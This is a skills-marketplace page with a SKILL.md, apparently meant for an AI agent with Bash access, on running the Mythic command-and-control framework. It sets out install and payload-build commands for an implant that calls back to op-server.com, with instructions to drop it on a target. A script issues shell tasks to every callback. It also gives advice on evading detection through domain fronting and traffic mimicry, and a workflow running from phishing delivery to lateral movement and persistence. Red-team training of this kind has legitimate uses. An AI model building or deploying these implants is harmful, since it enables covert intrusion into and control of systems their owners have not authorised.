Skip to main content

c2-mythic

Mythic C2 framework operations — multi-agent (Apfell, Apollo, Athena, Poseidon, Medusa), web UI on 7443, RabbitMQ + PostgreSQL backend, JSON-RPC tasking model, building an agent via mythic-cli, profile design (HTTP/SMB/named pipe/peer-to-peer), opsec defaults. Comparison to Sliver: more pluggable, less polished UI.

Zur Installation springen

Quellinformationen

Repository
BitterSecurity/Decepticon
Letzte Quellaktivität
26. Mai 2026 um 09:25
Erkannte Sprache von SKILL.md
Englisch
Sterne
5.611
Forks
1.061

Installationsoptionen

Standardmäßig ist der Prompt ausgewählt, der zuerst die Quelle prüft. Sie können zu einem direkten Befehl wechseln oder eine lokale Kopie herunterladen.

Quelldateien prüfen

Lesen Sie SKILL.md und alle von SkillsMP angezeigten Begleitdateien, bevor Sie sich für eine Installation entscheiden.

SKILL.md wird angezeigt

SKILL.md
Quellanweisungen · Schreibgeschützte Vorschau
name
c2-mythic
description
Mythic C2 framework operations — multi-agent (Apfell, Apollo, Athena, Poseidon, Medusa), web UI on 7443, RabbitMQ + PostgreSQL backend, JSON-RPC tasking model, building an agent via mythic-cli, profile design (HTTP/SMB/named pipe/peer-to-peer), opsec defaults. Comparison to Sliver: more pluggable, less polished UI.
allowed-tools
Bash Read Write
metadata
{"when_to_use":"mythic c2 apollo apfell poseidon athena medusa command and control agent payload tasking opsec mythic-cli","subdomain":"c2","tags":"c2, mythic, post-exploitation","mitre_attack":"T1071, T1105, T1057"}
# Mythic C2 Operator Skill Mythic (cody-thomas/Mythic) is a containerized, multi-agent C2 framework. Strengths: pluggable agents (~10+ official), good for cross-platform engagements, JSON-RPC tasking model is scriptable. ## Setup (one-time, on the operator server) ```bash # Clone + install git clone https://github.com/its-a-feature/Mythic cd Mythic sudo ./install_docker_ubuntu.sh # or install_docker_kali, install_docker_macos sudo ./mythic-cli start # Web UI: https://<host>:7443 # Default creds: mythic_admin / printed during install # Install agents (each is a separate container) sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo # Windows .NET agent sudo ./mythic-cli install github https://github.com/MythicAgents/Poseidon # macOS/Linux Go agent sudo ./mythic-cli install github https://github.com/MythicAgents/Medusa # cross-platform Python sudo ./mythic-cli install github https://github.com/MythicAgents/Athena # cross-platform .NET 6 ``` ## Agent matrix | Agent | Platform | Lang | Best for | |---|---|---|---| | **Apollo** | Windows | C# / .NET Framework 3.5+ | Windows-heavy engagements, .NET interop | | **Poseidon** | macOS, Linux | Go | Cross-platform, single static binary | | **Athena** | Windows / macOS / Linux | .NET 6/7/8 | Modern .NET, AOT-compiled | | **Apfell** | macOS | JavaScript for Automation (JXA) | Native macOS execution via osascript | | **Medusa** | any | Python | Quick prototypes, fileless | | **Service Wrapper** | Windows | C++ | Persistence via Windows service | ## Profile matrix Profiles = the comms channel. An agent can use one or more profiles. | Profile | Transport | Detection | |---|---|---| | **http** | Plain HTTP(S) with configurable headers, paths, jitter, sleep | Easiest to fingerprint; use behind redirector + domain fronting | | **websocket** | WS / WSS | Long-lived; suspicious from desktop | | **smb** | Named pipe over SMB | Peer-to-peer between Apollo agents — no internet needed for inner workstations | | **dns** | DNS TXT / A queries to attacker NS | Slow, but bypasses every HTTP-only firewall | | **peer-to-peer (SMB)** | One agent forwards another's traffic | Use for deep network — only one egress point needed | ```bash # Install a profile sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http sudo ./mythic-cli install github https://github.com/MythicC2Profiles/websocket sudo ./mythic-cli install github https://github.com/MythicC2Profiles/dns ``` ## Build a payload (Apollo + http profile) ```bash # CLI build (faster than web UI for repeatable ops) sudo ./mythic-cli payload create \ --name "stage1" \ --description "Apollo http to op-server.com" \ --agent Apollo \ --c2_profile http \ --c2_profile_parameter callback_host=https://op-server.com \ --c2_profile_parameter callback_port=443 \ --c2_profile_parameter encrypted_exchange_check=T \ --c2_profile_parameter callback_interval=30 \ --c2_profile_parameter callback_jitter=20 \ --c2_profile_parameter killdate=2025-12-31 \ --build_parameter version=net4.0 \ --output_file stage1.exe # Drop stage1.exe on the target — it calls back to op-server.com over HTTPS ``` ## Tasking from the operator Mythic provides: - Web UI (callback view → click + task) - `mythic-cli scripting` (Python wrapper) - Direct GraphQL API at `https://<host>:7443/v1/graphql` ```bash # Scripting example — list all callbacks, task each python3 -c ' from mythic import mythic, mythic_classes, mythic_utilities, mythic_callbacks import asyncio async def main(): m = await mythic.login(server_ip="op-server.com", username="op", password="pw") cbs = await mythic_callbacks.get_all_active_callbacks(mythic=m) for cb in cbs: await mythic_callbacks.issue_task(mythic=m, command_name="shell", parameters="whoami", callback_display_id=cb.display_id) asyncio.run(main()) ' ``` ## OPSEC defaults - **Profile encryption**: HTTP profile uses encrypted_exchange_check by default — key derived via Diffie-Hellman after the initial connect. Don't disable. - **Sleep / jitter**: default 30s/20% is loud. Production engagements: 5-minute sleeps, 25% jitter, weekly killdate. - **Callback host**: NEVER call back to a bare attacker IP. Use a domain on a CDN (CloudFront, Cloudflare), preferably with domain fronting. - **Build customization**: Apollo's build config supports custom headers, paths, useragent — match the target's expected traffic pattern (Slack workspace? Use Slack-like headers). - **Module loading**: prefer in-memory module loading (Apollo's `load` command) over dropping new files on disk. ## Common workflow ``` 1. Set up Mythic + profiles + agents (1 hr, one-time per engagement) 2. Stage redirector with HTTPS cert (CloudFront, nginx, ...) 3. Build payload(s) per target (1 per OS/objective) 4. Deliver via phish / exploit / pretext 5. On callback: 'whoami', 'hostname', 'pwd', 'ps' — basic survey 6. Network enumeration (token mimic, find-domain-controllers, etc.) 7. Lateral via SMB profile to peers — no new HTTP callbacks 8. Persistence after objective met 9. Clean up; teardown ``` ## Comparison vs Sliver / Cobalt Strike / Havoc | | Mythic | Sliver | Cobalt Strike | Havoc | |---|---|---|---|---| | **License** | OSS BSD | OSS GPL | $$$ commercial | OSS GPL | | **Agent maturity** | Excellent for .NET (Apollo) | Excellent Go single binary | Best-in-class | Improving fast | | **UI** | Good web | Web + CLI | Heavy Java client | Modern web | | **Detection** | Newer = less fingerprinted | Mid | Heavily detected | Newer | | **Multi-agent** | Yes (10+) | Single agent | Single (beacon + ext) | Single | | **Best for** | Cross-platform, scripted ops | Single-binary speed | Mature OPSEC | Modern web UI | ## References - Mythic docs — docs.mythic-c2.net - Cody Thomas's "Introducing Mythic" blog series - MythicAgents GitHub org — every official agent - "OPSEC for Modern C2 Frameworks" — RTO recordings
Auf GitHub ansehen